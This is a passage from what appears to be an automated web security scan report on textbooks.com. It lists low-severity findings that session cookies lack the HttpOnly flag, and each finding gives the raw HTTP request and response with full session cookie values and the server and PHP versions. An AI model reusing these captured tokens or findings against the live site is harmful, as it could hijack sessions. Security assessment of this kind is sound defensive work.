WEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=RtCUsbWXaFR47MNWPWHOzPcmR78poiHZjG7hDxh7QODVdNiT0%2FgnZ98hCqLh7wT9sDekHYtZF%2BwOIfrndsIMeQSDgDPcWbJF9puHQxEa6%2BitYnwan4YS%2FvP7UzwbH%2B2tMpGeGyOmWGv6%2BEOj8vihwI2MrJKUAULzP03b2fAeY7mTFQRQO1meIcgqIwr4x81VQwUR6Peqv6A%2FmYHiBf4HV3PFOZB%2BBiEKNLSRYdiRikFZB0Qjz58nLotkTytGq5lMmcHSx2D9n%2BlTV4Yi%2BQVQzsxLPIGEPrf7AdYh%2BDzuqpLg%2BnpWAXkJVSoQ0tnhvMmqVdnc8O0J%2BMEjDIyUriloigVUhNoty2m7L8tZMQykQRMxxifyi7VH4vM%2FEN4QUSvZpizcCfGKZQQRQwdyTQ19QVxz1p%2BV7U4%2FFn18CiISYeoJYlkJ93KaU88UkUEdKfVMVsf8jSpalZsEqCnX8MjAInoflORDE2NfnghY%2BMVz0tyRmaYXXo6CzRW20AnegvjjrXYCZfpFx2OJPzn4ct7MyUCh3gPOi2wdOcGjkG3OboZdX28ux7lIg0dTOu%2BAI3B28DUHw11eZ1cWfPelg3dHyaoetrpvnMbPI7gADHXiX909SEJY3oR0%2FQi6NZN9uaE51a5Ejjl5NZnfGZLEl7JeO7NTV%2F24Pqd%2BGbBjI8okC9xle6OnRbj0nolHzBgnJIvcj8m2TWNU9h87d6M%2FGdKDYi2i0KCpw9%2BBioCIasHoqfhJAzaUgZ2r8Uj2PIEMtGWNs5nZkPlHMvOxd0ObSZTJLyMW0M8IHUVoYLq%2FYWFeUP9VBnR0uTlqS5Feil%2B%2F2gieTTgQHSaCwK8IAWSTWr8uF5wGxJM%2FI3zruPwXAGf3Lkghr3ZwHI6Mlk%2BrQ4wMTicYC%2FYpFYaEztQf5bkaDbb0Xb5voEGInwWxmyt10dmD33Ngdapiq6h0VqcltGHBsCHOI9XgQ1DCBBqoOC64FfPQWBwheQkuY104mXfwXjwBh7Z75ifIj%2F9Dexa9lxyQDa6A%2BnrkNUhIFg1btmhOVziLgsDmmQOfPtYffSDnBpvGQGQBAmW2RgNKLkXXoJcVPburDXBmkxZNRHmwLKqH5k8DWhbfwgv6gDdOOBebqdbfwkGL02KMNXS8TDFMF6bzCnMfCqHaVeMlABDRdfCUzfeEMT8N%2BIHq77PK7fTKrHzsBx1JnjId9FT3NOmVy3UC%2FQfHBZvFFPmpiBP6VvfUDXLDuD%2BTWMXwseiTH4DuYDXrcgD15pGocCqojnb%2F0z4%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=qg3kYe9q6PN%2FD6c8q%2FY%3D; expires=Mon, 26-Dec-2011 13:52:11 GMT; path=/; domain=.textbooks.com
Content-Length: 126483


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.10. http://www.textbooks.com/Catalog/E/Education.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/E/Education.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/E/Education.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=%2BQT15syJFQpHp4dFG2eEpo5qhhxrN2NnXXojj%2B6vsjDlYwicebgGKOemaZwFuSpLGvERyDHJVrsOrpxCJqN516%2BVeigWN4CS52D%2ByFKeR9WqZXy2L93y1y0TTO%2FL02RMH3uE%2BkLM%2BDcTNSUgBGZyH95BMfWeoAzQs84E%2FN7tGPt7Fo0%2FhGQXKH0Q4G6Cwsv%2FNG7Ob7nyAy35Uay7WCIeTwknULTbN%2FHUrk0hmZi4EPkDKYy2miATcF2at%2FEsSO%2Fh1aVHxX2bKd5JenPNus0Tz0rHunwBvQRiIvOgX7KZdX%2BHieokPD%2BoevYGCabIOYnf47QzxWcbpCDnFVy%2BsRuNSNs3mMqT7k874RW0eZjFlmWEhBugfSwAR4nkFAXDQRZNqh8j9pZRXUOQCkFmQlEYrtJvrHZn0zj3uD9xH3sYcfy%2BSWUA%2FuGBxR9sNfqptweYYHDl4BY%2FVFhp97YXQ8Droky5fLCjVzc9xQrg82zPbc4tFVr1dLHFnDWamU6K1S0SrMwg%2FxYhK6Sx9yFUWsJRaFoj3Qn%2F80uOExnjGTTjcTd5qeqIdtxeTXDrc4PW7jrbB1%2BQf2Wpl8ja6dfhfhivhkSzKz5N55%2FOhwjl%2F7YXkfLIXv7QPZaDNaq3SASKNJBu1xaXoSdAp9zM%2B8WmxFGTHyb7BpSbx5gMxFsiMkQV%2FL5Le3M%2FaafjDNA8PJq7Z99F6Zw%2BnpQcZhZQoEarCEvnS9ZfOWQAxvEQ4RweR3i89Bba0LaEFdXa5WCAIuVwBg4mfSyjTfZQt1tIGM1q9m7ysaQqTNXIvivO4J1ILWGGHSgR5b34W20AWIBqC0%2B896S7nEXQzjMQA%2BEXtjQEO7k0UHW7YgbhQ345%2BIQilKuOxIJ9ifPgdJ2RpatlyzzW0x2CpA5BDE20evC4XQ1eO8uzlhKeXahsVWmYCDdp8mHm4Bb0hIMR5NSuZ7hD141zoqZ9fybUepYslfVHvcBsV%2F%2BEKepgQk3TpdEK4n26hoYBrZhR%2FpQ5GT3zgqiLdc5hldzuMLsT4%2Fmo9k%2BNZwqUZxXImfhbYAeIxadx0stzmiEdhIk9NRByVIv%2Bo%2B3zRlm5GS8DnsafkElC00Kyts9uRmQJjcwB8ELdqqD8jOy33w%2Fix6Spz%2FA5y2ziEUpkiomtan%2ByRTsRv7Cuz3Plqgqc%2FSIupUZ33THHanyIBH7T9%2FkPdgiTn1xA7gaYMSFCFIBgz%2Bim29x9J6B9UikJiji9arLw8%2F2p2jlGL0iFJUNVpZBaKDSXyul5fL8M9wruriM%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=VAA7TauIvNb3MpIV8EI%3D; expires=Mon, 26-Dec-2011 13:52:11 GMT; path=/; domain=.textbooks.com
Content-Length: 151328


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.11. http://www.textbooks.com/Catalog/G/History-and-Geography.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/G/History-and-Geography.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/G/History-and-Geography.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=u4V8YIRyYL1qO4cc8fpVBN8aXViG6zrMpu4wwzHQO52nr75S18JR3wKQDG%2F6HdqSbW4QUkr6KiMnTT4MmbRKlUQSFjq6uU3fuHi%2F%2F%2B1nt5MYKWVtEeGH8W2wV4XngH%2Ff4lGCyucp6LeVoYeLEofcQA8ORsuJ4%2BZlAMCevKHfwXSIBMuwcAG1G6rc8mX5srtdVcxAbu2Pvhoy%2BAr0sCOSeF5KF5Q54NDD66XMH7Y3YkmzCl4frseROWYqKlQIgkD1kJpaSayC2LcLtT1lZNhwIx%2FuaGnlhmC0s5sdvU66mrNOgAb50i9UDyDhtKUpqZxrF6oFkYLy1HiWoFx%2FhIrHwtR4WPgJFjC6UhOli9xNtmX3A6oqHGg%2FOuQv8USiVnjCgMTH3DgWXMUxjk1Ey9VgyIVJIMXQszvslZZ8c270r1Adqb%2FAtxDq0A6wHTf8n3PDxyOm1m%2BjbwSIIvfqAk3mSwHKKmRUxaRBpHr81XujCMTywdm9dCPL%2F0dEIKvQI0WJqDyAaglAAlbrthQfdIy9XKLroe9up673OqxDIgzlk7s5sKttSe8TH6zVmVU7UqU7hDeCBxUuLdxI9vXbqVZc2Fi7UMGO37sYeDZOxZdn4k%2Bt04W%2FN2XAskn%2Fnvw7m1ad6DDJ9H8%2FCZYIkykJNGBhg6dwezBCGDofHtcbcF3Ehqb1EIH5Y628zbdHjQAIzsWfKVg8910UAqVKx3FAQ1HxBGWu1p6fbO8ndZFdZBB%2FxRaJP6EdY0l48AOFB%2FgoZWmBej9U%2FYUL1lgF7B87JI%2FUO9%2F2Ri1ZAB9ENerR9zTLfGx7plZOUxM9cY5r96eYdqckWAi5inVnfyr9OAHoqvbEBrSg76ev9bg3bd7eELRwL9ZvrBxDrW9XKM41kzvvWzTLnlaIuMGgRT4gHTAl0h0dgylxaCwTzgdD0vIkDr9man%2FDvb1ehOIWMlhIGIz3MGb8WpYNNAMTX4r3MUO7AVfRzCL4haFO8M2ZdTDrz7Quii7Jf1h2irNSWvMSKj71pA7kVeQV%2FgAHLKsO%2B89PsBn4WC80sJWEsYVbn32qVgmh%2BoG%2BGf1FfTXkQ2lsUO%2FRGds6G0xpXtg54cIBUT8hiw0h26dhQnukxU0GOD2Z%2F%2BPiEf9SB2m3qjcN31ldmJlWTRqbHmSPvLZ9HTaJoqXCEw3FV7lXDFn5bX9SALvMeadgshk27xxwvii2z3PQDJYqIkD1RqBGOLY14ZLiE6Y2ga4ySSogX9FhoPWy9b90UQ%2FIyhoi6SzJZ7hjRqilfBU%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=2BZ3dFHzZbVUm9u%2FkwQ%3D; expires=Mon, 26-Dec-2011 13:52:13 GMT; path=/; domain=.textbooks.com
Content-Length: 140644


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.12. http://www.textbooks.com/Catalog/H/Arts-and-Humanities.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/H/Arts-and-Humanities.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/H/Arts-and-Humanities.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=6V6EGlHQRxeAYbzR8BD2Ib8Qdgrfw3njQmVZvpDHAaePV5%2FK6uG%2FoYHwgrYH0NbA9YRZXSWe55LoQiGKWi6KqREPPF5DwHlcNi0m8TGz7jleQcL1fsofYmMDSkhAFxwpaU9BcRoL9Jk1AVRjFpDF8%2FoOMwuoSxLWC%2FwknQLEuqHx3PvBbhFhGpgCqJWIe0Wr258LN%2BtKQtawmWP9xBvwGVYxaTTa3EzQMFIAwUZWhtpdV12HX0olp4YHSbETuruOWeL8f2HaAAFn1wKokujAsqh103pve0%2BqC44alxL549tkMvLkemBBX9XXudTrpZ3FidTlw8BdPh1HXyDBT6%2FhdF5uObdhNuxLVgHtP5WjjJVbCaGLR%2FVJeYRqG3hpEpeeJZN72hde4v1qVSht5U6MW6FpgoA22Usf1TIRfeAtlbdPEmXvshzsrybaMPdk70JZCQRC6Hp%2FgegUvLoDUmbgLWLzHX5XFcWOjK1w8qGasIh54wf3tC9iZ1YOvLGNCbdIIrjbj3hZeVB3pExWYPLkLnnbmMQixT9VbfrmiJuzUZyi7saFXFOQDx8fLGlMJecKi55%2BNv5IFXAP5XcHu%2FKFOYEpFB%2Ft0bIbAVb3mtdsuqESLdRFJRKpXxJ72pnceOt0koeUeG%2B0xchjjdc0WU894eTtzhi1GltfGgx7xa5W9McPSyLRnxsV0UeOiwdphcZfQXOV19efAzNtwZNeW%2FMm3T1GS64zIf403O%2FhgJ306hHrFKOmPd%2F5rS3fsbHJBTc6ViWCckTG04YXCuKqMBoANsW5FGN8u%2BjPUXRZiZ%2B92Mv61N7KDqOzYec6w0W4UvTwLoYPZ%2FQZYwQ5Jb9FPAZG4wvonVHgzXUsjsxWbZc4mS7IDQsSoEBp2UqOCs1nTNuYMKwctmQHCCqThti8nZWzFlXhOnZo8v7BDfAo%2BSRo1SO6fYDMZhCqgp0zgVIAFKIVwnc6nstSFDJt7DexP6XBQHJ9jU6FUEIxzFRzm3bEBU4rBtGhdCDB1oT2zzP%2BZ0uWl5N5GmBsUqfBo2Plmoj9i%2Bg2%2FlBXFffXn55MOhLfr9APP2MfUIVDuQeTOz6KBcJbFaF2lWoiqaRPyIddpxu1mRwQbrZrQHxeyz3gx%2Fn%2FksVaubH%2Bpb9K0JfRxlFSK%2B0XCeLVMY3lF8VhhTPNzCC0hKkOqb3Mm3umEziRmXy%2FkHgx%2BRFEpbjbaDZy16xInpJlSgQymNz5Ig64Z6J%2BMmyqciEwyrCt61VtFRAqXto3MGZ7tsHD0FW1aZnZIyQ%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=DCFkgYROO8MBmmRupNk%3D; expires=Mon, 26-Dec-2011 13:52:02 GMT; path=/; domain=.textbooks.com
Content-Length: 107266


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.13. http://www.textbooks.com/Catalog/HQL/General-Video-Titles.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/HQL/General-Video-Titles.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/HQL/General-Video-Titles.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:02 GMT
Connection: close
Connection: Transfer-Encoding
